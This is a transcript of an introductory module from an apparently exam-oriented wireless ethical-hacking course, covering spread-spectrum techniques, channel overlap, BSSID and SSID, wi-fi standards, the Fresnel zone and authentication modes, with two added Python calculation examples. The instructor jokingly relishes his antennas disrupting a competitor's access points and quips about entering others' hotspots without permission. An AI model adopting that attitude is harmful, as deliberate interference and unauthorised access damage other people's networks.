
Insights into Wireless

Wireless hacking, here we go. I'm so excited. My name is Dale Meredith and I'm going to be your
instructor for this particular course. I love this information. Just because of the fact that I've got a
background in it. It's kind of one of those things where you're very passionate about the things that
you know a lot about, right? (high voice) How passionate are you Dale? (elderly voice) Well, back when
I was a little boy I had my own little ISP service. (normal voice) Actually I found myself being
unemployed, this was right around 2001, right after 9/11 took place. The trading center that I was
working for didn't really plan correctly. They marketed mostly to transitional students. People that
were trying to make career changes and not necessarily to corporate. Well, after 9/11 took place, that
market really dried up. What I found, is that the market was also saturated. So, what I decided to do, I
live in a rural community, just north of Salt Lake City. In a city called Syracuse and we didn't have high
speed internet service. So, what I decided to do was start up my own ISP service and here's a lovely
picture of a handsome-looking guy on top of a water tower. This is about 125 feet up in the air and you
probably can't tell from my grip but it's like white knuckle time because I'm petrified of heights. What
I did was I went off and I rented space off of the Syracuse water tower. This water tower can be
seen because we're pretty, even though we're part of the Wasatch front, lot of mountains around
us. The city itself or this county is in kind of in a valley. So, it's relatively flat and this tower can be seen
for miles. So, because there was no high-speed internet out here at the time and I should say
affordable because ISDN was available. Boy, there's a term I just threw out that half of you just
went, "What's ISDN?" And the other half of you went, "Holy cow, I forgot about that term!" But there
was no affordable internet. Everybody was doing the ol' AOL, right? Where the computer screamed
at you. So, anyway I decided to start up this service. What I did is I put two T-1 lines into my garage. I
converted my garage over from a standard garage to an office and a server room environment. I put
an antenna on top of my roof, pointed it towards the Syracuse water tower and then put up an array
of antennas and access points on top of this tower. The company grew quite fast. It was actually one
of the fastest growing ISP services in the mountain west area. We actually went from zero to 600
customers. There's another picture of me and a good friend of mine, who is one of my workers. Putting
up some additional antennas on top of the water tower. We got so busy that we ended up having
to expand our service. We found another cell tower. If you do a little Google searching out there, you
might find an article out there about me. Concerning American towers. By the time that we were
done, I'm going to share with you some more stories, as we go through this course. About what I
experienced. By the time we were done, in Davis County, which is the county that I live in. You can see
here that I got the two red triangles here, representing the two towers. The thing that we have to
remember about wireless is that there's a lot that deals with what they refer to as line of sight. And
we'll talk about that a little later on as well. But we weren't able to get access to the internet to a lot
of customers, just because they didn't have line of sight. In the case of the water tower in Syracuse, we
put up several different antennas that had, they're called "sector based antennas" but they had
different types of modulational, or I should say, different degrees that they would provide service. We
went through and added tons of these. Especially as the company grew and grew. Including an
omni-directional antenna. We'll talk about in this course why omni-directionals are technically not as
powerful as sector based antennas. Of course, as the company grew, we then went through and added
that second tower and put in sector based antennas down there as well. We were able to cover pretty
much about an 18-20 mile stretch here of homes. This area was actually growing very very
rapidly. After growing this company, I went ahead and sold it off because I saw the writing in the
wall. We were finally getting Comcast, and at the time it was Quest, which I think now is
CenturyLink. Who knows what they are. Next week they'll be some other company. Anyway, they
finally started to come out in the area. But the service is still up and running. The gentlemen that I sold
it to, he actually sold it to another company. They're doing quite well because we have these new
subdivisions popping up and the commercial ISP's can't actually get out there fast enough. Next up, I'll
be showing you some slides from my family vacation. Well, if you know anything about me and my
courses, you know I love quotes. I've got one here for wireless. It's from Kevin Mitnick who's a famous
hacker. Who says, "New security loopholes are consistently..." And that's the key phrase there,
consistently. "Popping up because of wireless networking." Just when you think it's safe to get back on
the wireless network, we get another issue popping up on us. That's what we're here to talk about. In
this course, we're going to go through several different subjects. We're going to start off in this
module and talk about the insights into wireless. Making sure you have a good foundation. Some of it
may be kind of older but you'll need to know that information for your immediate future. Wink,
wink. Hint, hint. Nudge, nudge. That's my hint that you might see something in a possible exam, that
may be associated with this particular course. Can you tell, I can't tell you what may or may not be on
an exam? But we'll make sure you have a good firm foundation of wireless. We'll then go through in
another module and talk about the encryption that's used in wireless. Okay, let's face it folks, nothing
is unhackable. If you don't believe me, ask Apple and the FBI about hacking an iPhone. We'll then talk
about the different threats that become available because of wireless. Again, knowing is half our
battle when it comes to our ethical hacking or looking at this from a security specialist
perspective. We'll then go through and take a look at the methodology of hacking wireless. You're
going to see a lot of similarities. Between what we've talked about in some of the other
methodologies when it comes to hacking networks. It's just that this time it's on the air. So, that
actually opens up a new media. A media that we can't see. And because we're talking about
wireless, another wireless technology that is out there, that's extremely popular, is Bluetooth. So, we
will take a look at how we can hack Bluetooth. We refer to it as bluejacking. And how vulnerable we
are because of Bluetooth. And so you don't end up in the corner of the room, shivering in fear,
yelling, "Daddy make the bad man go away." We're going to talk about the countermeasures. Again,
remember when it comes to countermeasures, the concept is, to slow the attacker down. We can not
stop an attacker. Especially when it comes to wireless. So, we'll start off in this module, of insight into
wireless. We're going to go through and look at some terms that you have to make sure you
understand. Some of them may be terms that you're just familiar with the term but you may not
actually know what it represents. Some of those terms may be relatively new for you as well. We'll
then talk about the advantages and disadvantages to wireless. Then we'll go through and look at the
different types of wi-fi networks. (funny voice) Uh, Dale what do you mean by types of wi-fi
networks? Isn't it all just wireless? (normal voice) Yeah but, we create different types of
networks based off of wi-fi. Then we'll go through and take a look at different wi-fi standards. I know,
this is going to be the boring part of the lecture. We talk about the different 802.X standards. But you
need to know those for your, wink, wink, immediate future. Also talk about wi-fi authentication
modes. Now, this is completely different from encryption. There are two different types
of authentication modes, that again you need to make sure that you have clear in your mind. Another
wink, wink. Hint, hint. Nudge, nudge there. Then we'll talk about something called chalking. Some folks
call it WarChalking. Us cool guys, we just call it chalking. This is actually kind of a technology, not really
technology, but a concept that is being deprecated out because of how technology is advancing. But
we need to make sure we understand it so that when we look around, we see things a little
differently. And then of course, we'll talk about different types of antennas. See there's martian
antennas. There's T.V. antenna, nooo. I'm going to show you different types of antennas that we use
in wirelessand why some are better than others. And I'll also give you some helpful hints of how you
can improve the performance as well as the security just based off the antenna type you select. So,
let's adjust those antennas, let's see if we can't get a little bit of reception and let's get going.
New Terms to Learn

Okay, let's start off with new terms that we need to understand. Now, some of these terms you may
have heard of and had no idea what the acronym stood for or actually what was behind the
acronym and some of them you might not have heard of before. Let's start off first with looking at
one, that's called frequency-hopping spread spectrum. Which is also known as FHSS. Yeah, say that
one three times fast. Now, F-H-S-S-S-S-S-S, somebody stop me quick. Was actually invented by,
anybody, anybody? I'll give you a hint. (funny voice) Uh, Dale why'd you put a picture up of a beautiful
woman, who's obviously a movie actress? (normal voice) Well, this is Hedy Lamarr. Now, Ms. Lamarr
was not only a famous silver screen actress but she was also very intelligent. In fact, she was an
inventor. It's kind of funny. I watched a documentary about her. She was so beautiful that a lot of
men, again you have to think about the time of when she was around, didn't take her seriously. As far
as some of her inventions were concerned. But she's also famous for not only the spread spectrum
creation, but for something else that deals with computers. Anybody know? Don't Google it. Stop
it. Here let me give you another photo so you can take a look at her. (funny voice) Uh, gee Dale she
looks like Delilah from Samson and Delilah. (normal voice) Yes, that's right. That was one of her famous
roles but that has nothing to do with computers. Anybody else? Let me zoom up on this picture for
you. Do you see it yet? She was actually the model that is on the CorelDRAW box. Ohh. Everyone's
going, "Ohhh! CorelDRAW, yes." I think she was on the box up till about version nine, as I recall. So,
how was she involved in this? Well, it goes back to World War II, she came up with a quote, "Secret
Communication System." To actually help combat Nazis during World War II. They did this by
manipulating the radio frequencies at irregular intervals between transmissions and
receptions. Hence, hopping. Her invention, also formed an unbreakable code because it was hopping
around. That nobody could listen in. So, that classified messages could be transmitted without being
intercepted. Now, typically FHSS operates within the 900 megahertz to 2.4 gigahertz range. At the 900
megahertz range, we see things like Bluetooth. As well as, non-line of sight technologies being
utilized. We actually looked at the 900 megahertz frequency for our stuff, just because the user didn't
have to put an antenna on his roof. He could just put a little antenna on the side of his computer
desk and it would go through walls. Now, a variation of FHSS, is called adaptive frequency
hopping. Which, is also known as Bluetooth. Now, when it comes to FHSS, how it works is like
this. Within the spread spectrum itself, we have several different channels. Actually we go all the way
up to 14, but I was running out of room here. But I'm going to get the primary ones here. So, channel
one actually kind of flows and overlaps into channel two and three. And guess what, if I look at channel
two, it overlays between one and up to four. And you can see that it just goes across here and fills up
the spectrum. Well, with any type of spread spectrum technology, if you have a lot of devices
communicating on the exact same channel, that equals to a degradation of signal. So, what Hedy came
up with, and I call her Hedy because I talk about her a lot and I'm sure she and I would be good
friends. Is that she created this technology that allows the channel, or transmission, to jump between
the different channels. You actually do this, with what they refer to as a hop sequence. So, it is very
hard for anybody to intercept this traffic. In fact, by looking at this information or looking at a
frequency hopping environment, with a spectrum analyzer, it just looks like interference. Now,
obviously the two antennas, the receiving and sending antenna have to be on the same hop counts. So,
they know which channel they're hopping to and the next data packet transmission. Now, you may be
thinking, "Dale, that is so cool. Why don't we use that today?" Well, the problem with FHSS is its
speed limitations. We'll talk about that a little bit later on but I'll go ahead and kind of spoil it for you
here. It's limited to three megs. (funny voice) Uh, yeah Dale, that's not very fast. (normal voice) I know,
but back in my day we offered high speed internet, up to 512k and trust me, people thought that was
blazing fast. And they paid me $69.00 a month to me for it. It was great. I think my slowest speed was
128k and I charged $19.90, $19.99! So, next we have direct-sequence spread spectrum. This is
probably the most popular one because it's just known as DSSS. Now, it's the same channels. The same
frequencies but what happens is that you have to select which channel, both the sending and receiving
antennas going to be on. And they stay there. Well, this obviously makes it easier for someone to
intercept traffic. It also, as we talked about before, because the channels how they overlay with each
other, can create interference. For example, if you had a, so you could end up with interference from
other wireless devices. Like cordless phones. Microwaves. Actually fluorescent lamps will cause
interference. Well, with these channels, you can see them overlaid here. The questions usually comes
up with, "Well Dale, how do I select a channel that I won't interfere with another channel?" Well,
believe it or not, we call it the three sweet spots. The three sweet spots are right here. Channel one
does not interfere with channel six. Same thing between channel six and 11. There's actually a
separation. Some people might think, Well, five would be okay because five doesn't necessarily
interfere with one. Well, technically in the spectrum analyzer, that's not a clean separation. So, now
there's an issue that can come up if you get DSSS and FHSS. Man, that's a mouthful to say. If you get
them too close to each other. How I'm going to tell you about this, is we're going to go back down
memory lane, one more time with, "Story Time with Dale." You remember with direct sequence
spread spectrum. I might shorten this up and just say, "DS." from now on. And FH for frequency
hopping. Remember, they stay on the same channel. So, I decided that I wanted to start up my own ISP
service, which I mentioned earlier. Now, the Syracuse water tower, even though it's owned by
Syracuse City, it's actually in a different city. And the city, we're just going to say it's the city that want
to make Dale mad city. This city required me to go through and get a conditional use permit. At least
that was the condition of my renting the space on the top of the Syracuse water tower. Syracuse City
said, "You need to go to this particular city and say you can get this permit." So, I put in my
application and I appeared there and little did I know that the consultant for city of want to make Dale
mad, was actually a competitor of mine. He told them that my implementation would interfere with
their wireless that they put inside of their police vehicles. And they were using DS. So, when I
appeared, the city came out and said, "Sorry, we're not going to let you put up your antennas, go
home." I tried arguing the point with them. With the city council saying, "Hey, this is a public
frequency, you can't legislate this." They said, "Sorry, you're not going up. We're not going to give
you the permit." As I walked away I began to plan my revenge upon my nemesis. (evil laugh) Yeah, I
called the FCC. Told the FCC what was happening. Well, the FCC said, "Hang on, I'd like to throw a flag
on the play." They contacted the city offices and I got called back into a meeting with them. A private
meeting with the city manager and my competitor. I say competitor lightly because they were
charging astronomical rates. Like, $600 for equipment. We were allowing our users to rent the
equipment. Anyway, I got called back into a meeting. They said, "Listen, we're going to go ahead and
let you put up your antennas because the FCC contacted us and said that if we stopped you because
it's a public frequency that they would actually come and confiscate our equipment." Oh, it gets
better folks. So, going back to direct sequence. One of the reasons why I decided to go with frequency
hopping, one was so that I could have more antennas on the same tower but it also did something
kind of interesting. So, here's the direct sequence infrastructure. What it looks like. Well, when you
add frequency hopping to that environment and my antennas started hopping around, it would hit
the channels that my competitor was on and, oh darn it reset their access points. It's a shame. Now,
if anything. This story should tell you that you shouldn't mess with me because I've been trained by
the best. Look at that innocent little grin. I'm talking about Chuck Norris there. Not my grin. Okay,
another term that we need to understand is called basic service set identifier. Now, some of you guys
may confuse this with something called SSIDs. This is called BSSID. Very simple. Now, if you remember
our access points, they have their own MAC addresses. I don't want you to confuse this with the
SSID. We'll talk about that here in just a second. So, the BSSID, actually consists of the MAC address of
the access point. That has associated to it a BSS. Or a basic service set identifier. So, a single access
point together with all the associated stations is referred to as BSS. This way here the access point
acts as a master controller for all the stations with any BSS. Part of that is dealing with what they refer
to as the cell identifier. The cell identifier is just the antennas that are associated with the BSS. Now
the BSSID, as I mentioned before, has to do with MAC address of that device. What happens is that
the MAC address gets incremented and that is broadcasted and used for communication in the air over
wireless. If you've got a wireless network that is broadcasting on multiple bands, like, A-B-N-G, it gets
incremented again and again. So, it can be used for each one of those bands. If you go through and
use some type of packet capturing tool, you should be able to see the wireless MAC address floating
around the air. You can also see the access points broadcasting the BSSIDs. With Wireshark I think you
can filter it out by doing a show ap BSS-table. But that's just more information you really need to
know. Just something that stuck out in my little brain. We also have something called the SSID. Or the
service set identifier. This is what everybody's familiar with, when it comes to wireless right? It's
actually the network name. It can be up to 32 characters in length and the SSID is actually attached to
every single wireless packet that goes out onto the air. This is how you can have multiple access
points transmitting data to different systems but dropping, just like we see with a normal network
environment. If the packet's not destined for that particular network. It gets dropped. It's the same
concept. We just use this SSID because in the air there's other information floating around. Or maybe
it's not information. Maybe it's just interference.
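The channel overlap and the "three sweet spots" described above, worked through as an added example (this is not code from the course): it models the 2.4 GHz channel plan with 22 MHz wide DSSS channels, measures how many megahertz two channels share, and picks the non-overlapping set. Channel center frequencies follow the standard 802.11 layout (2407 + 5n MHz for channels 1 to 13, 2484 MHz for channel 14); the 22 MHz width is an assumption that matches the DSSS channels the lecture draws.

```python
# Added example, not code from the course: model the 2.4 GHz channel plan the
# lecture draws and check which channels overlap. Channel centers follow the
# 802.11 layout (2407 + 5*n MHz for channels 1-13, 2484 MHz for channel 14);
# each DSSS channel is assumed to occupy 22 MHz around its center.

from typing import Dict, Iterable, List, Tuple

CHANNEL_WIDTH_MHZ = 22  # occupied bandwidth of one DSSS channel (assumption)


def center_frequency_mhz(channel: int) -> int:
    """Center frequency of a 2.4 GHz Wi-Fi channel (1-14)."""
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    raise ValueError(f"no such 2.4 GHz channel: {channel}")


def channel_span_mhz(channel: int) -> Tuple[int, int]:
    """(low edge, high edge) of the 22 MHz band a channel occupies."""
    center = center_frequency_mhz(channel)
    half = CHANNEL_WIDTH_MHZ // 2
    return center - half, center + half


def overlap_mhz(a: int, b: int) -> int:
    """How many MHz two channels share; 0 means a clean separation."""
    lo_a, hi_a = channel_span_mhz(a)
    lo_b, hi_b = channel_span_mhz(b)
    return max(0, min(hi_a, hi_b) - max(lo_a, lo_b))


def channels_overlap(a: int, b: int) -> bool:
    """True when the two channels' bands share any spectrum."""
    return overlap_mhz(a, b) > 0


def sweet_spots(channels: Iterable[int] = range(1, 14)) -> List[int]:
    """Walk the channels in order and keep each one that does not overlap any
    channel already kept. On channels 1-13 this yields [1, 6, 11]."""
    chosen: List[int] = []
    for ch in channels:
        if all(not channels_overlap(ch, kept) for kept in chosen):
            chosen.append(ch)
    return chosen


def overlap_table(channels: Iterable[int] = range(1, 14)) -> Dict[int, List[int]]:
    """Map each channel to the other channels it overlaps with."""
    chans = list(channels)
    return {c: [o for o in chans if o != c and channels_overlap(c, o)] for c in chans}


if __name__ == "__main__":
    for ch in (1, 5, 6, 11):
        lo, hi = channel_span_mhz(ch)
        print(f"channel {ch:2d}: {lo}-{hi} MHz")
    # channel 5 still shares 2 MHz with channel 1, so it is not a clean split
    print("channels 1 and 5 share", overlap_mhz(1, 5), "MHz")
    print("channels 1 and 6 share", overlap_mhz(1, 6), "MHz")
    print("sweet spots:", sweet_spots())
```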

Advantages & Disadvantages

Okay, before we dive deeper into some of the other subjects concerning hacking wireless
networks, let's first pause for a second and talk about the advantages and disadvantages of this
media. It's kind of weird to say media because there's really nothing there. Or I should say, there's
nothing in between. So, let's first talk about the disadvantages because from a security perspective, it
is the biggest issue for us with wi-fi. Now, obviously without any type of security enabled, ethernet
would be more secure. Duh, because you have a limitation of the media itself. I hate to break it to
you but there's a lot of misconceptions when it comes to the authentication mechanisms that we can
use. Another disadvantage is, obviously, bandwidth. It's kind of funny because everybody always
thinks when they go off and buy a new router or new wi-fi connection and it says that it's a hundred
megabits. They think, "Oh, I'm truly getting a hundred megabits." Well, you're not. How they calculate
the bandwidth, or the advertisement of the bandwidth, is by taking both the sending and receiving
speeds and combining those together. So, for example if you had a router that said it was 200
megabit, they're technically talking about a router that supports a hundred megabit up and a hundred
megabit down. Now, the other issue for us, as far as a disadvantage, when wireless is concerned and
bandwidth is the more people you get on the wi-fi network, the slower the speeds can
become. Another thing that can actually affect bandwidth is reception quality. The further you get
away or weaker the signal is on your wi-fi device, the slower speeds you'll experience. That's how the
devices are designed to work. Obviously you don't want to transmit at a high rate of speed, if you're
losing packets because your receptions are not strong. So, we're going to slow things down a
bit. Another disadvantage is obviously upgrades. When they come out with a new speed we're
upgrading equipment like crazy. Not only at the access point level but also on the devices. Then we
have to worry about if they're backwards compatible. And of course backwards compatibility always
means we have a security risk involved. Another thing, and this is probably one that a lot of folks don't
really pay attention to, and that is interference. Not interference from other access points. However,
that is a concern but interference from other devices that have nothing to do with wireless networks. I
mentioned before that fluorescent lights can interfere. Bluetooth devices can interfere. Cordless
phones, anything that's kind of wireless itself, as well as anything that puts out a microwave. In fact,
hey there you go right there a microwave. You know the cook your popcorn up in. It can actually cause
interference because it's microwave technology that we're utilizing here. Okay, now that I've bummed
you out. You don't want to use wi-fi anymore. Let's give the shiny side of things here. Let's talk about
the advantages of wi-fi. One of the biggest advantages, from the IT perspective is, hello,
installation. Put a box up here and I've got access anywhere I want to go. I no longer have to rely on
ethernet cabling being run through a wall. Or somebody wanting to move their desk in their office and
have to reroute cabling for them. Or if I buy the building next to me or a business expands to the
building next to us. I don't have to worry about running cables across. Easy connectivity is also an
advantage. Almost everybody knows how to hook into a wi-fi access point. Or into a wi-fi network. But
give somebody a crimping tool and some cable, watch their confused look. Watch their confused look
on their face. So, it's very easy to add devices. I just got a report from my wife who happens to be an
HR director for Best Buy, and Best Buy just announced that most homes today, have up to 13 wi-fi
devices in their homes. One of my favorite advantages is the mobility. Being able to again, move
around. As I said before with installation, I don't have to worry about if I want to move from one room
to another. Especially in my home. Or if I want to go out on the back patio and just relax. I can take
my laptop with me. In my actual neighborhood, those of you guys who have heard the story, I have a
networked neighborhood. A bunch of us who live right next door to each other, we're all in IT, and we
have network cabling running between our homes. We have different types of servers. We have a
movie server. We rip all of our DVDs. We have a MP3 server. We've got VMs that we can play around
with. It's just kind of fun. One of my neighbors is a database administrator. Another one's an IT Project
Manager. Another guy's a Linux guy. Then there's this super guy, that teaches a lot. (laughs) But we set
up our wi-fi access points in our house so that we can roam. So, if I get too far out of my backyard and
into my neighbor's backyard, I automatically roll over to his access point. Now, one of my favorite
things to do is, I use my cell phone as a hotspot all the time. I'll tell you the reason why I do that. But
first let's talk about public access. That's an advan... Whoa! Hang on a second. Public access is an
advantage? Well, they want to make it seem like that way because hey I can go down to
McDonald's and jump on the wi-fi. In fact, I just happened to visit my local Wal-Mart the other day
and they've got a sticker on the front of their doors that says, "Free wi-fi at our store." And I'm looking
at this and going, "Oh crap!" Not, "Oh cool!" Now, the reason why I said I'd talk about this here in just
a second, when it comes to mobility, I use my phone all the time as a wi-fi hotspot but only for my
devices. I do that because my phone has a vpn connection. I actually run a vpn software. So that
anything that I do on my systems can't be, or don't go through a public wi-fi access point. You guys
have probably heard this one before as well. Please do yourself a favor and if you see an access point
that says free wi-fi. Don't get on it. A majority of those times, those are rogue access points. Or an
attacker trying to get you to hook into his access point and he then becomes a man in the middle for
you. Isn't that nice of him? Provide you free wi-fi and all he gets is your bank account.

Types of Wi-Fi Networks

Okay, so let's talk about the types of wi-fi networks that are out there. (funny voice) Dale, what do
you mean by types of wi-fi? Isn't it all just wireless? (normal voice) No, not really. Matter of fact here's
where we're going to play around with some terms. Because we use terms today like access point or
we may call it an A-P. We envision it a specific way. What it is today. But access points started off a
little differently. First let's talk about, the first type we refer to as an extension to networks, and what
we mean by that is that initially access points, notice my little asterisk here, because when we say
access points we have this tendency of thinking of the little Cisco, or Linksys, or D-Link product. I should
run through all the different brands, so I don't have to pay any type of copyright infringements
here. But we envision these devices that are actually not only access points but also switches and
routers. But you can purchase just an access point that all it's designed to do is to be a bridge to bridge
wireless folks so they can gain access to the wired network. Now, another type is just simply two of
these extension networks that are designed to communicate with each other. We refer to these as LAN
to LAN networks. We often see this being done between buildings. Another type is what we refer to as
a multiple access point network. This is where we have multiple access points representing the
same, remember our BSSID? Representing the same BSSID, so that no matter where you go within the
building, or within the environment, your traffic is directed back to the same network. Now, in order
to appropriately deploy these, you need to make sure the access points overlap each other as far as
coverage is concerned. This actually makes it so the user has the ability to move around or
roam between the two connections. Never losing connectivity. Then we also have something that
we refer to as cellular access networks. This is where we use a cellular service to provide access to the
internet. Back in the day I was actually impressed, got a hold of a neat little router that had a slot on
the back that I could actually plug in a PCMCIA card that was sold by a local Telco that would give me
wireless network. It was great, we used it in trade shows. We didn't have to pay for internet at the
trade show. Now, if you want you can think of this as the grandfather, to what we refer to as our
cellular hot spots today. Where our phones turn into a full access point for us, so that when you're at
the airport, you can sit down, turn on the wi-fi on your phone. Let your tablet hook in and hey, why
don't you let me hook in there. Or, if I don't have your permission maybe I'll just make my way in
anyways.

Wi-Fi Standards

So, let's talk about wi-fi standards. (snobbish voice) We should all have standards. I personally don't
deal with any wi-fi that's less than dual band gigabit. Anything less, is just for the little people. (normal
voice) Now, (laughs) what I mean by this or wi-fi standards is, I need to make sure you understand
some concepts. When it comes to these standards. First of all, wi-fi for the most part, is what we refer
to as line of sight. Which means the antennas have to see each other for the optimum transmission
speeds. Anything that you place in between wireless devices degrades the signal. So, for example, a
tree may not necessarily stop the signal but it's going to break it up a bit. Here's what's really funny. Let's
have a flashback. (mimics flashback tune) Back to my ISP days. We would go through and install
people and we would jump up on the roofs and we would look out to see if we could see the water
tower. It was a very very bright blue object that you could see for miles. Many times we would get up
there not realizing the time and season. And it would be in the fall or winter. We'd go, "Oh yeah,
there's the water tower, right over there." We'd set up the antenna, point it right at it. Things were
great till spring came along. And then all of a sudden we had customers calling up saying, "Hey, my
speeds are getting slower." And we'd go back out there, jump up on the roof and go, "Where'd the
water tower go?" There's a bunch of trees in the way. It's because the leaves filled in. Now, different
objects can create, what we refer to as reflection. We'll talk about that here in just a second. One of
the biggest culprits of reflection is, yeah, buildings. So, in your home when you set up an access
point, the sheetrock and studs in the wall slow the signal down. Just like what we saw in the tree. If
you place your access point in the basement because of, typically cinder blocks that are used down
there or concrete, the signal gets absorbed and won't pass through. The same thing applies with
steel. In fact if you go to my kid's elementary school, you walk in the front door, it's such an old
building, I guess I shouldn't complain because it's well constructed obviously but it's made out of bricks
and mortar. It must be some thick brick because literally as soon as I walk in, my cell phone goes from
four bars to zero. Again what's happening is that the signal's being reflected off of the material. One
of the other biggest culprits, it's kind of interesting and cool, little side notes here for you, is water is
a great reflector. Again, back when I had my ISP days, we would see how far we would see our
signal and if we were going to cross land we were limited to about eight to ten miles. Now, I just
happen to live near a huge lake of salt. In fact you might say, it's a great salt lake. (laughs) Just off of
the lake, or in the lake, is a place that's called, "Antelope Island." There's a causeway that you can
drive out to it. So, we drove out to it and it was a distance of about 10 miles to the water tower. But
what's amazing is our signal was like 83 percent strong. Because what happens is that the
microwave just simply bounced. Almost like a rock skipping, off of the surface of the water. Which
gave it more distance. Normally the signal would just go into the ground and be absorbed. Okay,
there's something else you need to realize, when it comes to line of sight. It goes something like
this, we know that we need to have line of sight between wireless devices. In this case here we've got
two different buildings with access points. We're trying to connect them up together. Now both of
them are transmitting. In this case here they're vertically polarized. So, this is often referred to as the
beam-width. Well, where both of these beam-widths intersect with each other, we have something
referred to as the Fresnel zone. The Fresnel zone has a rule to it. At this intersection, and there's a big
calculation out there you can go do, but I'm just going to give you a rule of thumb. Here it is: the
Fresnel zone cannot be blocked more than 40 percent. If it is blocked more than 40 percent you
have the possibility of not only losing bandwidth but also not having any signal at all. This was another
frustrating thing for me back in my ISP days because again we would go and get a customer up and
going, a business up and running, and all of a sudden another building would go up. Or
a tree would get taller and intersect into that fresnel zone, even though we'd get on the roof of the
one building and we could see the water tower clear as day, we couldn't get a signal. Now, many times
about this point, I have students usually ask me, "Well, Dale, does snow or sleet, or rain, or fog cause
issues?" And the answer is, "Well it depends." Not normally so much. In a standard rain storm,
no. You're not going to see a huge decline in transmission. Extremely thick fog, absolutely, because
humidity or moisture in the air, the more dense that it is. Remember how the great salt lake, the water
reflected the beam. Well, guess what? If the moisture or the humidity is too dense in the air, it's going
to reflect my signal. Another thing that could actually affect signal strength, as well, is high
wind. Especially if the antennas are not secured down adequately. If they sway just a couple of
inches you could actually lose signal strength and bandwidth. So, now that we got that out of the
way. I'm just going to quickly show you the different wi-fi technologies that are currently out, unless
I'm missing one. I don't think I am though. Nothing in your immediate future. This is just a great
reference chart. Because we talked about different technologies here. Now the latest and greatest, at
least as of the publishing of this particular course, is 802.11AC. I don't know if we'll see anything
faster for some time, in fact, the time frame between N and AC was about six or seven years. Which is,
in computer years, like a lifetime, right? Now, one of the big advantages of AC is that it does keep you
cool. No, that's not what AC stands for. Maybe it's always cool. But it's based off of the original
802.11N. Because they did this, they actually extended the air interface to a wider RF band. Actually
up to like 160 megahertz, and they allow up to eight mimo connections. Or streams. It allows them to
be backwards compatible. With 802.11G, B, and A. Now, please always note that when they talk
about speeds, these are theoretical speeds. Here'd be my other suggestion for you too, this one ended
up biting me in the backend when they released 802.11G. I rushed off to get the latest and
greatest. The standard had not been set by IEEE. Some of you guys may have experienced this but
back in the old days, you'd go off and buy a Netgear wireless card and it wouldn't work with a D-link
router. It's because it was Netgear's own version of G and same thing with D-link. They wouldn't
communicate properly with each other. So, make sure that the IEEE Standard's been ratified,
which AC was actually ratified back in 2014. So, you should be good to go. Now, 802.16, also known
as WiMax. There's something we don't hear a lot about the reason being is because it's typically used
by commercial companies. To provide, as what they refer to, as last mile wireless broadband access to
DSL or cable. So, we sometimes see it used for microwave backhauls. Unfortunately, something came
along called long term evolution or LTE. So, WiMax has kind of gone the way of the dodo bird.
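The "big calculation" behind the 40 percent rule of thumb above is the first Fresnel zone radius. As an added example (not the course's own code), the check below computes that radius along a link and reports how much of it each obstacle intrudes into; it reads "blocked more than 40 percent" as an obstacle reaching more than 40 percent of the way into the first-zone radius, and the link, tower heights and obstacles are constructed for illustration.

```python
"""
Fresnel-zone clearance check (added example, not from the course).
Standard formulas: first Fresnel radius F1 = 17.32 * sqrt(d1*d2 / (D*f))
metres with d1, d2, D in km and f in GHz; earth bulge = d1*d2 / (12.75*K)
metres with the usual K = 4/3 refraction factor.
"""
import math


def fresnel_radius_m(d1_km: float, d2_km: float, freq_ghz: float, zone: int = 1) -> float:
    """Radius in metres of the n-th Fresnel zone at a point d1 km from one
    antenna and d2 km from the other."""
    total_km = d1_km + d2_km
    return 17.32 * math.sqrt(zone * d1_km * d2_km / (total_km * freq_ghz))


def earth_bulge_m(d1_km: float, d2_km: float, k_factor: float = 4 / 3) -> float:
    """How far the Earth's curvature raises the ground between the antennas;
    negligible on short links, a metre or two on a 10 km hop."""
    return d1_km * d2_km / (12.75 * k_factor)


def check_link(length_km, freq_ghz, tx_height_m, rx_height_m, obstacles, max_blocked=0.40):
    """obstacles: list of (name, distance_from_tx_km, top_height_m).

    Returns (link_ok, per-obstacle report). An obstacle 'blocks' the fraction
    of the first Fresnel radius it intrudes into below the line of sight; the
    rule of thumb says that fraction must stay at or below max_blocked (0.40).
    Terrain between the antennas is assumed flat apart from the obstacles."""
    report = []
    for name, d1, top_m in obstacles:
        d2 = length_km - d1
        # straight line between the antenna tops at this point of the path
        los_m = tx_height_m + (rx_height_m - tx_height_m) * d1 / length_km
        clearance_m = los_m - (top_m + earth_bulge_m(d1, d2))
        radius_m = fresnel_radius_m(d1, d2, freq_ghz)
        # 0.0 = zone fully clear, 1.0 = obstacle reaches the line of sight,
        # above 1.0 = obstacle sticks up into the optical path itself
        blocked = max(0.0, 1.0 - clearance_m / radius_m)
        report.append({
            "name": name,
            "visible": clearance_m > 0,  # optical line of sight only
            "blocked": round(blocked, 3),
            "ok": blocked <= max_blocked,
        })
    return all(r["ok"] for r in report), report


# Constructed scenario: a 10 km link at 2.4 GHz from a 38 m tower to an 8 m
# rooftop antenna, with an office block near the tower and a tree near the
# customer that is below the optical line of sight but inside the zone.
EXAMPLE_OBSTACLES = [
    ("office block", 2.0, 20.0),
    ("tree (leaves out)", 9.0, 8.0),
]

if __name__ == "__main__":
    ok, report = check_link(10.0, 2.4, 38.0, 8.0, EXAMPLE_OBSTACLES)
    for entry in report:
        print(entry)
    print("link ok" if ok else "link marginal: first Fresnel zone over-blocked")
```

The tree in the sample is "visible" in the optical sense (you can still see the tower over it) yet blocks about 77 percent of the zone radius, which is exactly the spring-time failure described above.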
Wi-Fi Authentication Modes

Let's talk about wi-fi authentication modes. Now, this has nothing to do with the type of encryption
we're going to be utilizing. When IEEE released the 802.11 Standard they actually defined two
different methods that wireless devices could use to authenticate to a wireless access point. Before
actual network communication would take place. One of these two methods is referred to as open
system authentication. Now in order for OSA to actually work, the SSID of the computer should
match the SSID of the wireless access point, or the WAP. First, the computer or the device, sends out
a probe request. Looking to see if there's actually an access point out there with that SSID and the
access point responds back with a probe response. Next the computer, or device, sends an
authentication request. The access point generates an authentication code. Usually it's
random, and sends it back in an open system authentication response. At this point, the device then
accepts that authentication code and sends an association request, which again the access point
responds with an association response and the system becomes a part of the network. As long as the
session continues and as long as the computer remains within the range of the original access
point. Now, the other mechanism is referred to as shared key. Again, to start the connection
process, the computer sends a request for authentication to the access point. The access point,
responds by generating a sequence of characters, called a challenge text. The computer encrypts the
challenge text with its WAP key. Hey, this is where WAP comes into play, right? The computer then
encrypts the challenge text and transmits the message back. The access point decrypts the
message and compares it to the result of the original challenge text. If there's no discrepancies, the
access point sends an authentication code. The computer, or device, is then able to hook
